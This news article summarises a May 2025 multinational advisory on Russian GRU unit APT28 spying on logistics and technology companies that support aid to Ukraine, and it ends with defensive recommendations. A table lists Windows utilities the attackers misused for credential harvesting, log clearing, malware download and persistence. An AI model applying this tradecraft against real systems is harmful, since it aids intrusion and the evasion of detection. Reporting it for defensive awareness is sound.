The U.S. Cybersecurity and Infrastructure Security Agency (CISA), in partnership with the NSA, FBI, and international cybersecurity bodies, has issued a joint advisory warning that Russian military hackers are actively targeting logistics and technology companies in the West.
The cyber campaign mainly focuses on organizations involved in transporting and delivering aid to Ukraine. The advisory, released on May 21, 2025, names the threat actor as the Russian GRU’s 85th Main Special Service Center—also known as APT28, Fancy Bear, or Forest Blizzard.
Ongoing Espionage Since 2022
According to the advisory, the cyber espionage campaign has been active since 2022 and uses known methods to gain access and gather intelligence.
“This cyber espionage-oriented campaign targeting technology companies and logistics entities uses a mix of previously disclosed tactics, techniques, and procedures,” the advisory states. “The authoring agencies expect similar targeting and TTP use to continue.”
Hackers have breached dozens of organizations across 13 countries, including the U.S., Ukraine, and several European nations. Key sectors affected include defense, maritime operations, air traffic management, IT services, and transportation facilities such as ports and airports.
Targeting Critical Infrastructure and Surveillance Devices
In a more alarming move, the attackers have accessed IP cameras at sensitive sites, such as border crossings and military areas, to track aid movements into Ukraine. More than 80% of these cameras were located in Ukraine, while others were in neighboring countries like Poland, Hungary, Romania, and Slovakia.
After breaching these networks, the attackers searched for data related to aid logistics—such as sender and recipient information, transport IDs, travel routes, container numbers, and cargo descriptions.
Use of Common Windows Tools for Malicious Purposes
The GRU group has used built-in Windows utilities to perform unauthorized activities and avoid detection. Below is a summary of how these tools were misused:
| Utility | Description of Malicious Use |
|---|---|
| ntdsutil | Extracted Active Directory databases for credential harvesting. |
| wevtutil | Cleared Windows event logs to erase evidence of attacks. |
| vssadmin | Created shadow copies to access locked files during data theft. |
| schtasks | Set up malicious scheduled tasks to maintain access. |
| wmic | Collected system data and ran remote commands for lateral movement. |
| certutil | Decoded malicious files and validated forged certificates. |
| net | Listed network shares and user accounts for reconnaissance. |
| reg | Changed registry settings to disable defenses and keep persistence. |
| powershell | Ran encoded scripts to steal credentials and install malware. |
| bitsadmin | Downloaded additional malware while avoiding detection. |
| icacls | Changed file permissions to access sensitive documents. |
The advisory warns that these activities show how the hackers can repurpose everyday system tools to conduct surveillance and data theft without relying on external malware.
International Response and Recommendations
The alert is backed by cybersecurity authorities from the U.S., U.K., Germany, Poland, the Czech Republic, Australia, Canada, France, Denmark, Estonia, and the Netherlands. This wide support reflects international concern about the GRU’s continued operations.
CISA urges companies in logistics and tech sectors to take immediate action. Recommended steps include:
- Enable network segmentation to limit lateral movement.
- Use multi-factor authentication with strong methods.
- Apply security patches and software updates regularly.
- Monitor system and access logs for unusual activity.
This alert follows a similar warning earlier this month, in which Russian hackers were linked to attacks on water system infrastructure. These ongoing threats show the growing danger of state-sponsored cyber operations targeting critical industries worldwide.
